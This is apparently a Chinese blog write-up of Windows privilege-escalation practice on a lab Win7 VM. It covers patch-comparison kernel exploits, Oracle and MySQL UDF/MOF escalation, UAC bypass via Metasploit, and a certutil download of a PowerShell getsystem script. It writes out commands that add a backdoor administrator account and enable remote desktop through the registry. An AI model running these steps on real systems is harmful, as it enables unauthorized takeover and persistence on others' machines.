0X00背景

今天看到了Bypass的一篇提权文章,大体列出了基本的提权方式。就这些提权方式来进行实际利用实践下。

0x01实践开始

1.通过补丁号对比提权

补丁对比工具:
https://github.com/AonCyberLabs/Windows-Exploit-Suggester
对应exp:
https://github.com/SecWiki/windows-kernel-exploits

环境:虚拟机Win7

1622254388641

首先让其上线,然后信息收集systeminfo(主要补丁号):

systeminfo

image-20210111101544063

不愧是靶机。。

算了只是走个流程:

image-20210111101947094

先是更新补丁库,然后会写入一个xls文件。

然后进行对比寻找可利用exp:

python windows-exploit-suggester.py --database 2021-01-11-mssb.xls --systeminfo win7.txt

image-20210111103343009

紧接着是报错。网上搜索了下新的这个xlrd不支持xlsx了。

换个老版本:

python -m pip uninstall xlrd
python -m pip install xlrd==1.2.0 -i http://pypi.douban.com/simple --trusted-host pypi.douban.com

image-20210111103543443

毫无疑问都可以用。。

image-20210111103726449

那就直接用cs的16-016

image-20210111103801608

刚刚这个工具也查出来了:

OK不智能的情况出现了:

image-20210111103847874

我给你整个systeminfo信息。你就不能对一下版本。。

image-20210111104551222

最后用14 -058拿到了system权限。

接下来是一些常规操作:

添加管理员

net user 用户名 密码 /add
net localgroup Administrators 用户名 /add

开启远程桌面

# 开启远程
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
# 查询远程端口
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber

2.数据库提权

bypss文章中主要讲了Mysql和sql server提权,这些以前也都搞过的。

Oracle

先看一下oracle提权:

数据库提权一般都会利用到存储过程,而oracle也可以利用到存储过程的缺陷将低权限提权到高权限。

主要利用一个工具odat:

https://github.com/quentinhardy/odat/releases/tag/4.3

MYSQL

udf:通过创建用户自定义函数,对mysql功能进行扩充,可以执行系统任意命令。将mysql账号root转化为系统system权限。
mof:在windows平台下,c:/windows/system32/wbem/mof/nullevt.mof这个文件会每间隔一段时间(很短暂)就会以system权限执行一次,所以,只要我们将我们先要做的事通过代码存储到这个mof文件中,就可以实现权限提升。
启动项:将后面脚本上传到系统启动目录,当服务器重启就会自动执行该脚本,从而获取系统权限。

UDF:

image-20210111111926078

首先使用命令行检查相关Mysql路径以及权限。

之前我记得在哪看到过NULL,代表莫法使用udf进行提权,而如果是空的就可以写入自定义函数。

在网上找到了解决方案:https://www.cnblogs.com/jiangfeilong/p/11311896.html

secure_file_priv
这个参数用来限制数据导入和导出操作效果,例如执行LOAD DATA、SELECT ...INTO OUTFILE语句以及LOAD_FILE()函数。这些操作需要用户具有FILE权限,
如果这个参数为空,这个变量没有效果。注意这里的空代表空白。
而NULL的话,mysql服务会禁止导入和导出操作,这个参数在mysql 5.7.6版本引入。
这上面这一句话要好好斟酌哈。。。我的就低于这个版本:

image-20210111113223949

打脸。。

SQL SERVER

3.Bypass UAC提权

UAC(User Account Control,用户账号控制),是微软引入的一种安全机制。Bypass UAC提权,可以将管理员权限提升到system权限。

msf:
use exploit/windows/local/bypassuac
cs:
点一下。。。 

4.利用Powershell直接提权至system

脚本下载:

certutil -urlcache -split -f https://raw.githubusercontent.com/decoder-it/psgetsystem/master/psgetsys.ps1

挂。。VPN去浏览器下载下来吧

参考文章:Bypass公众号-Windows提权的几种常用姿势